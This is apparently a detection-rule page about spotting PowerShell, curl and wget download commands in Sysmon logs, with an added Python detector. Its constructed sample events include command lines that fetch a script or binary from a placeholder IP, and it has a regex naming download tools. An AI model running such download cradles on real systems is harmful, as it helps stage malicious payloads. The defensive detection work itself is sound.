Invoke-WebRequest Command

Anvilogic Forge

Summary
This detection rule monitors and alerts on the execution of PowerShell commands that threat actors commonly use to download malicious content from the internet. It detects the typical download commands 'Invoke-WebRequest' and 'Invoke-RestMethod', along with the traditional command-line tools 'curl' and 'wget'. The rule's logic uses specific Sysmon event codes to capture the related execution events, identifying suspicious behavior that may indicate malicious activity or data exfiltration attempts. The rule references several high-profile threat actor groups known to use these methods, including APT28, FIN13, and Wizard Spider, among others, and lists software commonly associated with these actors, such as Trickbot and Qakbot. This underlines the rule's value for identifying and mitigating potential threats in a Windows environment by leveraging Sysmon logs for monitoring.
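As an added example (not Anvilogic's rule logic, which this page does not show), the core matching step in Python, run over a few constructed Sysmon process-creation records. It assumes Sysmon Event ID 1 as the event code and also covers the PowerShell aliases iwr and irm, which the summary does not list.

```python
"""Flag download-cradle commands in Sysmon process-creation events (added example)."""
import re

# Assumption: the rule keys on Sysmon Event ID 1 (process creation).
PROCESS_CREATE = 1

# Commands named in the rule plus their PowerShell aliases (iwr/irm); in Windows
# PowerShell 5.1, curl and wget are themselves aliases for Invoke-WebRequest.
# Lookarounds stop substring hits such as "curlyfries.exe" or "use-wget.txt".
DOWNLOAD_CMDS = re.compile(
    r"(?<![\w.-])(Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl(?:\.exe)?|wget(?:\.exe)?)(?![\w-])",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# Constructed sample events (not real telemetry), shaped like Sysmon EID 1 fields.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -Command "Invoke-WebRequest http://203.0.113.10/x.ps1 -OutFile x.ps1"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl.exe -s http://203.0.113.10/a.bin -o a.bin"},
    {"EventID": 1, "Image": r"C:\Program Files\Curlyfries\curlyfries.exe",
     "CommandLine": "curlyfries.exe --update"},                       # substring only: no alert
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c iwr http://203.0.113.10/y"},   # network event, not EID 1: ignored
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes\how-to-use-wget.txt"},     # keyword inside a path: no alert
]


def detect_download_commands(events):
    """Return one alert per process-creation event whose command line runs a download command."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != PROCESS_CREATE:
            continue
        cmdline = ev.get("CommandLine", "")
        match = DOWNLOAD_CMDS.search(cmdline)
        if not match:
            continue
        # Surface the matched command and any URL so an analyst can pivot on the destination.
        alerts.append({"image": ev.get("Image"), "command": match.group(1),
                       "urls": URL_RE.findall(cmdline)})
    return alerts


if __name__ == "__main__":
    for alert in detect_download_commands(SAMPLE_EVENTS):
        print(alert)
```

curl.exe ships with Windows 10 1803 and later, so expect benign hits from installers and scripts; tune on parent process, user context and destination reputation rather than on the command name alone.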
Categories
  • Windows
  • Endpoint
  • Cloud
  • On-Premise
Data Sources
  • Process
  • Windows Registry
  • Application Log
ATT&CK Techniques
  • T1041
  • T1074.001
  • T1572
  • T1566.001
  • T1087.002
  • T1059.001
  • T1105
Created: 2024-02-09